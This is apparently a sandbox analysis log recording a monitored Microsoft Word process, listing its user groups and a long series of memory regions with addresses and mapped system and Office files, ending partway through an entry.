# Flog Txt Version 1
# Analyzer Version: 2.3.2
# Analyzer Build Date: Nov 22 2018 14:27:27
# Log Creation Date: 27.11.2018 09:36:01.222
Process:
id = "1"
image_name = "winword.exe"
filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe"
page_root = "0x46612000"
os_pid = "0x8ec"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x0"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 133
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 134
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 135
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 136
start_va = 0x40000
end_va = 0x43fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 137
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 138
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 139
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 140
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 141
start_va = 0xf0000
end_va = 0xf6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 142
start_va = 0x100000
end_va = 0x101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 143
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 144
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 145
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 146
start_va = 0x140000
end_va = 0x141fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 147
start_va = 0x150000
end_va = 0x152fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 148
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 149
start_va = 0x170000
end_va = 0x17ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 150
start_va = 0x180000
end_va = 0x182fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 151
start_va = 0x190000
end_va = 0x192fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 152
start_va = 0x1a0000
end_va = 0x1a2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 153
start_va = 0x1b0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 154
start_va = 0x2b0000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 155
start_va = 0x3b0000
end_va = 0x3b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 156
start_va = 0x3c0000
end_va = 0x3c2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 157
start_va = 0x3d0000
end_va = 0x4cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 158
start_va = 0x4d0000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 159
start_va = 0x600000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 160
start_va = 0x610000
end_va = 0x797fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 161
start_va = 0x7a0000
end_va = 0x920fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 162
start_va = 0x930000
end_va = 0x1d2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 163
start_va = 0x1d30000
end_va = 0x1ffefff
entry_point = 0x1d30000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 164
start_va = 0x2000000
end_va = 0x23f2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002000000"
filename = ""
Region:
id = 165
start_va = 0x2400000
end_va = 0x243ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 166
start_va = 0x2460000
end_va = 0x2460fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002460000"
filename = ""
Region:
id = 167
start_va = 0x2470000
end_va = 0x2470fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002470000"
filename = ""
Region:
id = 168
start_va = 0x2480000
end_va = 0x24fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 169
start_va = 0x2530000
end_va = 0x2534fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 170
start_va = 0x2540000
end_va = 0x2541fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002540000"
filename = ""
Region:
id = 171
start_va = 0x2550000
end_va = 0x255bfff
entry_point = 0x2550000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 172
start_va = 0x2560000
end_va = 0x2567fff
entry_point = 0x2560000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 173
start_va = 0x2570000
end_va = 0x257ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 174
start_va = 0x2580000
end_va = 0x277ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 175
start_va = 0x2780000
end_va = 0x285efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002780000"
filename = ""
Region:
id = 176
start_va = 0x2860000
end_va = 0x286ffff
entry_point = 0x2860000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 177
start_va = 0x2870000
end_va = 0x2870fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002870000"
filename = ""
Region:
id = 178
start_va = 0x2880000
end_va = 0x297ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 179
start_va = 0x2980000
end_va = 0x2a3ffff
entry_point = 0x2980000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 180
start_va = 0x2ab0000
end_va = 0x2abffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ab0000"
filename = ""
Region:
id = 181
start_va = 0x2ac0000
end_va = 0x2ac0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ac0000"
filename = ""
Region:
id = 182
start_va = 0x2ad0000
end_va = 0x2ad0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ad0000"
filename = ""
Region:
id = 183
start_va = 0x2ae0000
end_va = 0x2ae0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ae0000"
filename = ""
Region:
id = 184
start_va = 0x2af0000
end_va = 0x2afffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 185
start_va = 0x2b00000
end_va = 0x2b00fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 186
start_va = 0x2b10000
end_va = 0x2b10fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 187
start_va = 0x2b20000
end_va = 0x2b21fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b20000"
filename = ""
Region:
id = 188
start_va = 0x2b30000
end_va = 0x2b30fff
entry_point = 0x2b30000
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 189
start_va = 0x2b40000
end_va = 0x2b5ffff
entry_point = 0x2b40000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")
Region:
id = 190
start_va = 0x2b60000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 191
start_va = 0x2c60000
end_va = 0x2c60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002c60000"
filename = ""
Region:
id = 192
start_va = 0x2d70000
end_va = 0x2d71fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002d70000"
filename = ""
Region:
id = 193
start_va = 0x2d80000
end_va = 0x2d80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002d80000"
filename = ""
Region:
id = 194
start_va = 0x2da0000
end_va = 0x2da1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002da0000"
filename = ""
Region:
id = 195
start_va = 0x2db0000
end_va = 0x2e2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 196
start_va = 0x2e30000
end_va = 0x2e30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e30000"
filename = ""
Region:
id = 197
start_va = 0x2e50000
end_va = 0x2ecffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e50000"
filename = ""
Region:
id = 198
start_va = 0x2ed0000
end_va = 0x2f4efff
entry_point = 0x2ed0000
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 199
start_va = 0x2f50000
end_va = 0x2f60fff
entry_point = 0x2f50000
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 200
start_va = 0x2fb0000
end_va = 0x30affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fb0000"
filename = ""
Region:
id = 201
start_va = 0x30b0000
end_va = 0x315afff
entry_point = 0x30b0000
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 202
start_va = 0x3190000
end_va = 0x328ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003190000"
filename = ""
Region:
id = 203
start_va = 0x3290000
end_va = 0x338ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003290000"
filename = ""
Region:
id = 204
start_va = 0x3390000
end_va = 0x378ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 205
start_va = 0x3790000
end_va = 0x388ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003790000"
filename = ""
Region:
id = 206
start_va = 0x3970000
end_va = 0x3a6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003970000"
filename = ""
Region:
id = 207
start_va = 0x3a70000
end_va = 0x3b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003a70000"
filename = ""
Region:
id = 208
start_va = 0x3c20000
end_va = 0x3c2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c20000"
filename = ""
Region:
id = 209
start_va = 0x3c30000
end_va = 0x3d2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c30000"
filename = ""
Region:
id = 210
start_va = 0x3d50000
end_va = 0x3dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d50000"
filename = ""
Region:
id = 211
start_va = 0x3dd0000
end_va = 0x41cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003dd0000"
filename = ""
Region:
id = 212
start_va = 0x4280000
end_va = 0x437ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004280000"
filename = ""
Region:
id = 213
start_va = 0x43b0000
end_va = 0x44affff
entry_point = 0x0
region_type = private
name = "private_0x00000000043b0000"
filename = ""
Region:
id = 214
start_va = 0x44c0000
end_va = 0x45bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000044c0000"
filename = ""
Region:
id = 215
start_va = 0x45c0000
end_va = 0x46bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000045c0000"
filename = ""
Region:
id = 216
start_va = 0x4800000
end_va = 0x4b42fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004800000"
filename = ""
Region:
id = 217
start_va = 0x4b50000
end_va = 0x534ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004b50000"
filename = ""
Region:
id = 218
start_va = 0x5380000
end_va = 0x547ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005380000"
filename = ""
Region:
id = 219
start_va = 0x5480000
end_va = 0x54fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005480000"
filename = ""
Region:
id = 220
start_va = 0x5570000
end_va = 0x566ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005570000"
filename = ""
Region:
id = 221
start_va = 0x5740000
end_va = 0x583ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005740000"
filename = ""
Region:
id = 222
start_va = 0x5850000
end_va = 0x585ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005850000"
filename = ""
Region:
id = 223
start_va = 0x5860000
end_va = 0x618ffff
entry_point = 0x5860000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 224
start_va = 0x6260000
end_va = 0x62dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006260000"
filename = ""
Region:
id = 225
start_va = 0x6390000
end_va = 0x648ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006390000"
filename = ""
Region:
id = 226
start_va = 0x64c0000
end_va = 0x65bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000064c0000"
filename = ""
Region:
id = 227
start_va = 0x65e0000
end_va = 0x66dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000065e0000"
filename = ""
Region:
id = 228
start_va = 0x6740000
end_va = 0x683ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006740000"
filename = ""
Region:
id = 229
start_va = 0x68b0000
end_va = 0x68bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000068b0000"
filename = ""
Region:
id = 230
start_va = 0x68d0000
end_va = 0x69cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000068d0000"
filename = ""
Region:
id = 231
start_va = 0x6a70000
end_va = 0x6b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006a70000"
filename = ""
Region:
id = 232
start_va = 0x6b70000
end_va = 0x736ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006b70000"
filename = ""
Region:
id = 233
start_va = 0x73f0000
end_va = 0x74effff
entry_point = 0x0
region_type = private
name = "private_0x00000000073f0000"
filename = ""
Region:
id = 234
start_va = 0x74f0000
end_va = 0x84effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000074f0000"
filename = ""
Region:
id = 235
start_va = 0x8620000
end_va = 0x869ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000008620000"
filename = ""
Region:
id = 236
start_va = 0x8780000
end_va = 0x87fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000008780000"
filename = ""
Region:
id = 237
start_va = 0x8800000
end_va = 0x8bfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000008800000"
filename = ""
Region:
id = 238
start_va = 0x8c00000
end_va = 0x9000fff
entry_point = 0x0
region_type = private
name = "private_0x0000000008c00000"
filename = ""
Region:
id = 239
start_va = 0x9010000
end_va = 0x9410fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009010000"
filename = ""
Region:
id = 240
start_va = 0x9420000
end_va = 0x9820fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009420000"
filename = ""
Region:
id = 241
start_va = 0x9830000
end_va = 0x9a2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009830000"
filename = ""
Region:
id = 242
start_va = 0x9a30000
end_va = 0xaa30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009a30000"
filename = ""
Region:
id = 243
start_va = 0xaa40000
end_va = 0xae3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000aa40000"
filename = ""
Region:
id = 244
start_va = 0x37a30000
end_va = 0x37a3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000037a30000"
filename = ""
Region:
id = 245
start_va = 0x37c80000
end_va = 0x37c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000037c80000"
filename = ""
Region:
id = 246
start_va = 0x751b0000
end_va = 0x751e2fff
entry_point = 0x751b0000
region_type = mapped_file
name = "osppc.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")
Region:
id = 247
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x77a20000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 248
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x77b20000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 249
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 250
start_va = 0x77e00000
end_va = 0x77e06fff
entry_point = 0x77e00000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 251
start_va = 0x77e10000
end_va = 0x77e12fff
entry_point = 0x77e10000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 252
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 253
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 254
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 255
start_va = 0x13fcd0000
end_va = 0x13feabfff
entry_point = 0x13fcd0000
region_type = mapped_file
name = "winword.exe"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe")
Region:
id = 256
start_va = 0x7febdd50000
end_va = 0x7febdd5ffff
entry_point = 0x0
region_type = private
name = "private_0x000007febdd50000"
filename = ""
Region:
id = 257
start_va = 0x7febfb90000
end_va = 0x7febfb9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007febfb90000"
filename = ""
Region:
id = 258
start_va = 0x7fee47a0000
end_va = 0x7fee49f4fff
entry_point = 0x7fee47a0000
region_type = mapped_file
name = "ivy.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\IVY.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ivy.dll")
Region:
id = 259
start_va = 0x7fee4a00000
end_va = 0x7fee57d5fff
entry_point = 0x7fee4a00000
region_type = mapped_file
name = "chart.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll")
Region:
id = 260
start_va = 0x7fee57e0000
end_va = 0x7fee58f9fff
entry_point = 0x7fee57e0000
region_type = mapped_file
name = "adal.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ADAL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\adal.dll")
Region:
id = 261
start_va = 0x7fee5900000
end_va = 0x7fee5a73fff
entry_point = 0x7fee5900000
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll")
Region:
id = 262
start_va = 0x7fee5a80000
end_va = 0x7fee5d1afff
entry_point = 0x7fee5a80000
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll")
Region:
id = 263
start_va = 0x7fee5d20000
end_va = 0x7fee5db8fff
entry_point = 0x7fee5d20000
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 264
start_va = 0x7fee5dc0000
end_va = 0x7fee5f3dfff
entry_point = 0x7fee5dc0000
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 265
start_va = 0x7fee5f40000
end_va = 0x7fee610ffff
entry_point = 0x7fee5f40000
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 266
start_va = 0x7fee6110000
end_va = 0x7fee62acfff
entry_point = 0x7fee6110000
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 267
start_va = 0x7fee62b0000
end_va = 0x7feea696fff
entry_point = 0x7fee62b0000
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll")
Region:
id = 268
start_va = 0x7feea6a0000
end_va = 0x7feeb394fff
entry_point = 0x7feea6a0000
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 269
start_va = 0x7feeb3a0000
end_va = 0x7feeb7dcfff
entry_point = 0x7feeb3a0000
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 270
start_va = 0x7feeb7e0000
end_va = 0x7feed20bfff
entry_point = 0x7feeb7e0000
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll")
Region:
id = 271
start_va = 0x7feed210000
end_va = 0x7feedeb6fff
entry_point = 0x7feed210000
region_type = mapped_file
name = "mso98win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll")
Region:
id = 272
start_va = 0x7feedec0000
end_va = 0x7feee98efff
entry_point = 0x7feedec0000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 273
start_va = 0x7feee990000
end_va = 0x7feef073fff
entry_point = 0x7feee990000
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 274
start_va = 0x7feef080000
end_va = 0x7feef522fff
entry_point = 0x7feef080000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 275
start_va = 0x7feef530000
end_va = 0x7fef04b4fff
entry_point = 0x7feef530000
region_type = mapped_file
name = "oart.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll")
Region:
id = 276
start_va = 0x7fef04c0000
end_va = 0x7fef2c98fff
entry_point = 0x7fef04c0000
region_type = mapped_file
name = "wwlib.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll")
Region:
id = 277
start_va = 0x7fef2d10000
end_va = 0x7fef2d7efff
entry_point = 0x7fef2d10000
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 278
start_va = 0x7fef3170000
end_va = 0x7fef31aafff
entry_point = 0x7fef3170000
region_type = mapped_file
name = "mlang.dll"
filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll")
Region:
id = 279
start_va = 0x7fef3320000
end_va = 0x7fef3330fff
entry_point = 0x7fef3320000
region_type = mapped_file
name = "msointl30.dll"
